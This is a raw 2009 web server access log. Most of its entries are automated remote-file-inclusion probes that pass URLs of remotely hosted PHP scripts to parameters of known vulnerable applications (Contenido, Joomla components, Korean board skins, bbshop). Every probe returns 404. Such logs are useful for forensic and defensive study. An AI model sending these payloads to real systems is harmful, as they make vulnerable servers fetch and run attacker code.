85.94.201.138 - - [15/Oct/2009:20:55:09 -0500] "GET /logs/home.php?index=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:20:55:29 -0500] "GET /home.php?index=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:20:55:29 -0500] "GET /home.php?index=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:20:55:29 -0500] "GET /logs/home.php?index=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:20:55:29 -0500] "GET /logs/access_log.1250121600/home.php?index=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:20:55:29 -0500] "GET /logs/access_log.1250121600/home.php?index=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:20:55:38 -0500] "GET /logs/home.php?index=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:20:55:38 -0500] "GET /logs/access_log.1242172800/home.php?index=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:20:55:55 -0500] "GET /logs/access_log.1242172800/home.php?index=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:20:56:00 -0500] "GET /logs/access_log.1242172800/home.php?index=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
121.254.170.204 - - [15/Oct/2009:20:56:15 -0500] "GET /logs/access_log.1233705600/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:20:56:51 -0500] "GET /home.php?index=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:20:56:51 -0500] "GET /logs/home.php?index=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:20:56:51 -0500] "GET /logs/access_log.1241049600%20%20/home.php?index=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.254.170.204 - - [15/Oct/2009:20:57:17 -0500] "GET /logs/access_log.1233705600/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://garculas.justfree.com/fx29id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:20:59:29 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:20:59:29 -0500] "GET /logs/access_log.1243555200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 364 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:20:59:29 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:20:59:29 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 364 "-""Mozilla/5.0"
147.46.116.207 - - [15/Oct/2009:20:59:43 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
147.46.116.207 - - [15/Oct/2009:20:59:43 -0500] "GET /logs/access_log.1246147200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
147.46.116.207 - - [15/Oct/2009:20:59:43 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
147.46.116.207 - - [15/Oct/2009:20:59:43 -0500] "GET /logs/access_log.1246924800//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
147.46.116.207 - - [15/Oct/2009:20:59:43 -0500] "GET /logs/access_log.1242864000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
147.46.116.207 - - [15/Oct/2009:21:00:20 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
147.46.116.207 - - [15/Oct/2009:21:00:20 -0500] "GET /logs/access_log.1246924800//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
147.46.116.207 - - [15/Oct/2009:21:00:20 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
147.46.116.207 - - [15/Oct/2009:21:00:20 -0500] "GET /logs/access_log.1246147200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
78.31.105.194 - - [15/Oct/2009:21:01:18 -0500] "GET /logs/access_log.1247443200//include/print_category.php?setup[use_category]=1&dir=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
78.31.105.194 - - [15/Oct/2009:21:01:18 -0500] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
78.31.105.194 - - [15/Oct/2009:21:01:18 -0500] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
78.31.105.194 - - [15/Oct/2009:21:02:13 -0500] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
78.31.105.194 - - [15/Oct/2009:21:02:13 -0500] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
78.31.105.194 - - [15/Oct/2009:21:02:14 -0500] "GET /logs/access_log.1247443200//include/print_category.php?setup[use_category]=1&dir=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
63.223.85.28 - - [15/Oct/2009:21:02:37 -0500] "GET /logs/access_log.1248912000//bemarket/postscript/postscript.php?p_mode=http://www.bellangora.fr//mail/x1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
63.223.85.28 - - [15/Oct/2009:21:02:37 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://www.bellangora.fr//mail/x1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
63.223.85.28 - - [15/Oct/2009:21:02:37 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.bellangora.fr//mail/x1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
65.55.207.29 - - [15/Oct/2009:21:03:32 -0500] "GET /logs/access_log.1194825600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.111 - - [15/Oct/2009:21:04:32 -0500] "GET /logs/access_log.1149033600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.219.245.149 - - [15/Oct/2009:21:06:09 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://bp.hs.kr/bbs/data/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
200.219.245.149 - - [15/Oct/2009:21:06:09 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://bp.hs.kr/bbs/data/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:21:06:22 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 364 "-""Mozilla/5.0"
200.219.245.149 - - [15/Oct/2009:21:06:26 -0500] "GET /logs/access_log.1238025600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://bp.hs.kr/bbs/data/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
200.219.245.149 - - [15/Oct/2009:21:06:26 -0500] "GET /logs/access_log.1237248000//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://bp.hs.kr/bbs/data/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:21:07:04 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
85.17.19.172 - - [15/Oct/2009:21:08:50 -0500] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
85.17.19.172 - - [15/Oct/2009:21:08:50 -0500] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
85.17.19.172 - - [15/Oct/2009:21:08:50 -0500] "GET /logs/access_log.1253318400///skin/ggambo7002_board/comment_modify.php?dir=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
70.38.54.146 - - [15/Oct/2009:21:09:24 -0500] "GET /nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
70.38.54.146 - - [15/Oct/2009:21:09:24 -0500] "GET /logs/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
200.219.245.149 - - [15/Oct/2009:21:13:09 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://bp.hs.kr/bbs/data/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
200.219.245.149 - - [15/Oct/2009:21:13:09 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://bp.hs.kr/bbs/data/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
200.219.245.149 - - [15/Oct/2009:21:13:09 -0500] "GET /logs/access_log.1237248000//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://bp.hs.kr/bbs/data/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
200.219.245.149 - - [15/Oct/2009:21:13:09 -0500] "GET /logs/access_log.1238025600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://bp.hs.kr/bbs/data/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
65.55.106.229 - - [15/Oct/2009:21:15:31 -0500] "GET /logs/access_log.1206835200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.9.225.71 - - [15/Oct/2009:21:21:16 -0500] "GET ///skin/ggambo7002_board/modify.php?dir=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
72.9.225.71 - - [15/Oct/2009:21:21:16 -0500] "GET /logs///skin/ggambo7002_board/modify.php?dir=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
72.9.225.71 - - [15/Oct/2009:21:21:17 -0500] "GET /logs/access_log.1252886400///skin/ggambo7002_board/modify.php?dir=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
72.9.225.71 - - [15/Oct/2009:21:21:30 -0500] "GET ///skin/ggambo7002_board/modify.php?dir=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
72.9.225.71 - - [15/Oct/2009:21:21:30 -0500] "GET /logs/access_log.1252886400///skin/ggambo7002_board/modify.php?dir=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
72.9.225.71 - - [15/Oct/2009:21:21:30 -0500] "GET /logs///skin/ggambo7002_board/modify.php?dir=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
65.55.207.54 - - [15/Oct/2009:21:22:02 -0500] "GET /logs/access_log.1244073600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.48.121.149 - - [15/Oct/2009:21:22:05 -0500] "GET /logs//include/prodler.class.php?sPath=http://www.chumo.net/bbs/script/temp/idxx.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.48.121.149 - - [15/Oct/2009:21:22:05 -0500] "GET //include/prodler.class.php?sPath=http://www.chumo.net/bbs/script/temp/idxx.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
211.48.121.149 - - [15/Oct/2009:21:22:05 -0500] "GET /logs/access_log.1246579200//include/prodler.class.php?sPath=http://www.chumo.net/bbs/script/temp/idxx.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
72.9.225.71 - - [15/Oct/2009:21:22:23 -0500] "GET /logs/access_log.1253318400///skin/ggambo7002_board/modify.php?dir=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
72.9.225.71 - - [15/Oct/2009:21:22:31 -0500] "GET /logs/access_log.1253232000///skin/ggambo7002_board/modify.php?dir=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
65.55.107.180 - - [15/Oct/2009:21:22:32 -0500] "GET /logs/access_log.1157932800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.9.225.71 - - [15/Oct/2009:21:23:18 -0500] "GET /logs/access_log.1253318400///skin/ggambo7002_board/modify.php?dir=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
72.9.225.71 - - [15/Oct/2009:21:23:22 -0500] "GET /logs/access_log.1253232000///skin/ggambo7002_board/modify.php?dir=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
72.30.78.215 - - [15/Oct/2009:21:25:15 -0500] "GET /logs/access_log.1238457600 HTTP/1.0" 200 233358 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
147.46.116.207 - - [15/Oct/2009:21:30:21 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
147.46.116.207 - - [15/Oct/2009:21:30:22 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
147.46.116.207 - - [15/Oct/2009:21:30:22 -0500] "GET /logs/access_log.1238025600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
147.46.116.207 - - [15/Oct/2009:21:30:22 -0500] "GET /logs/access_log.1237248000//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
85.17.19.172 - - [15/Oct/2009:21:31:48 -0500] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
85.17.19.172 - - [15/Oct/2009:21:31:48 -0500] "GET /logs/access_log.1253318400///skin/ggambo7002_board/comment_modify.php?dir=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
85.17.19.172 - - [15/Oct/2009:21:31:48 -0500] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
85.17.19.172 - - [15/Oct/2009:21:31:51 -0500] "GET /logs/access_log.1253232000///skin/ggambo7002_board/comment_modify.php?dir=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
78.31.105.194 - - [15/Oct/2009:21:31:52 -0500] "GET /logs/access_log.1252368000//skin/sirini_8200/ezset.php?dir=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
78.31.105.194 - - [15/Oct/2009:21:31:52 -0500] "GET /logs//skin/sirini_8200/ezset.php?dir=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
78.31.105.194 - - [15/Oct/2009:21:31:52 -0500] "GET /logs/access_log.1251504000//skin/sirini_8200/ezset.php?dir=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
78.31.105.194 - - [15/Oct/2009:21:31:52 -0500] "GET //skin/sirini_8200/ezset.php?dir=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
78.31.105.194 - - [15/Oct/2009:21:33:19 -0500] "GET /logs//skin/sirini_8200/ezset.php?dir=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
78.31.105.194 - - [15/Oct/2009:21:33:19 -0500] "GET /logs/access_log.1251504000//skin/sirini_8200/ezset.php?dir=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
78.31.105.194 - - [15/Oct/2009:21:33:19 -0500] "GET //skin/sirini_8200/ezset.php?dir=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
78.31.105.194 - - [15/Oct/2009:21:33:19 -0500] "GET /logs/access_log.1252368000//skin/sirini_8200/ezset.php?dir=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
89.108.122.160 - - [15/Oct/2009:21:34:44 -0500] "GET /logs/access_log.1251417600//bbs/skin/happycast_category_lightblack/login.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
89.108.122.160 - - [15/Oct/2009:21:34:44 -0500] "GET /logs//bbs/skin/happycast_category_lightblack/login.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
89.108.122.160 - - [15/Oct/2009:21:34:44 -0500] "GET //bbs/skin/happycast_category_lightblack/login.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:21:35:05 -0500] "GET /logs//galeria.php?start=0&kategoria=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:21:35:05 -0500] "GET //galeria.php?start=0&kategoria=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:21:35:05 -0500] "GET /logs/access_log.1249603200//galeria.php?start=0&kategoria=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:21:35:07 -0500] "GET //galeria.php?start=0&kategoria=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:21:35:07 -0500] "GET /logs//galeria.php?start=0&kategoria=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:21:35:07 -0500] "GET /logs/access_log.1249603200//galeria.php?start=0&kategoria=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:21:35:07 -0500] "GET //galeria.php?start=0&kategoria=http://www.smokin57.com/public_html//modules/Forums/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:21:35:07 -0500] "GET /logs/access_log.1249603200//galeria.php?start=0&kategoria=http://www.smokin57.com/public_html//modules/Forums/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:21:35:07 -0500] "GET /logs//galeria.php?start=0&kategoria=http://www.smokin57.com/public_html//modules/Forums/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:21:35:08 -0500] "GET //galeria.php?start=0&kategoria=http://www.smokin57.com/public_html//modules/Forums/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:21:35:08 -0500] "GET /logs//galeria.php?start=0&kategoria=http://www.smokin57.com/public_html//modules/Forums/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:21:35:08 -0500] "GET /logs/access_log.1249603200//galeria.php?start=0&kategoria=http://www.smokin57.com/public_html//modules/Forums/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:21:35:16 -0500] "GET /logs/access_log.1250121600//galeria.php?start=0&kategoria=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:21:35:17 -0500] "GET /logs/access_log.1250121600//galeria.php?start=0&kategoria=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:21:35:23 -0500] "GET /logs/access_log.1250121600//galeria.php?start=0&kategoria=http://www.smokin57.com/public_html//modules/Forums/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:21:35:31 -0500] "GET /logs/access_log.1250121600//galeria.php?start=0&kategoria=http://www.smokin57.com/public_html//modules/Forums/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
78.31.105.194 - - [15/Oct/2009:21:37:06 -0500] "GET /logs/access_log.1228608000%20%20///bbshop/admin/admin.php?_shop_path=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
78.31.105.194 - - [15/Oct/2009:21:37:06 -0500] "GET /logs///bbshop/admin/admin.php?_shop_path=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
78.31.105.194 - - [15/Oct/2009:21:37:06 -0500] "GET ///bbshop/admin/admin.php?_shop_path=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
78.31.105.194 - - [15/Oct/2009:21:38:17 -0500] "GET /logs/access_log.1228608000%20%20///bbshop/admin/admin.php?_shop_path=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
78.31.105.194 - - [15/Oct/2009:21:38:17 -0500] "GET /logs///bbshop/admin/admin.php?_shop_path=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
78.31.105.194 - - [15/Oct/2009:21:38:17 -0500] "GET ///bbshop/admin/admin.php?_shop_path=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
65.55.207.23 - - [15/Oct/2009:21:39:31 -0500] "GET /logs/access_log.1114300800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
78.31.105.194 - - [15/Oct/2009:21:39:52 -0500] "GET /logs/access_log.1232755200///bbshop/admin/admin.php?_shop_path=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
78.31.105.194 - - [15/Oct/2009:21:39:58 -0500] "GET /logs/access_log.1230681600///bbshop/admin/admin.php?_shop_path=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:21:41:02 -0500] "GET /logs/access_log.1252368000/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:21:41:02 -0500] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:21:41:02 -0500] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:21:41:18 -0500] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:21:41:18 -0500] "GET /logs/access_log.1252368000/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:21:41:18 -0500] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:21:41:18 -0500] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:21:41:18 -0500] "GET /logs/access_log.1252368000/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:21:41:18 -0500] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
63.223.85.28 - - [15/Oct/2009:21:41:36 -0500] "GET /logs/access_log.1248652800//bemarket/postscript/postscript.php?p_mode=http://www.bellangora.fr//mail/x1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
78.31.105.194 - - [15/Oct/2009:21:42:10 -0500] "GET /logs/access_log.1228608000///bbshop/admin/admin.php?_shop_path=http://www.separc.com/foro//zfxid1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
78.31.105.194 - - [15/Oct/2009:21:43:19 -0500] "GET /logs/access_log.1240531200//skin/zero_vote/login.php?dir=http://www.separc.com/foro/zfxid1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
78.31.105.194 - - [15/Oct/2009:21:43:19 -0500] "GET //skin/zero_vote/login.php?dir=http://www.separc.com/foro/zfxid1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
78.31.105.194 - - [15/Oct/2009:21:43:19 -0500] "GET /logs//skin/zero_vote/login.php?dir=http://www.separc.com/foro/zfxid1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
78.31.105.194 - - [15/Oct/2009:21:43:32 -0500] "GET //skin/zero_vote/login.php?dir=http://www.separc.com/foro/zfxid1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
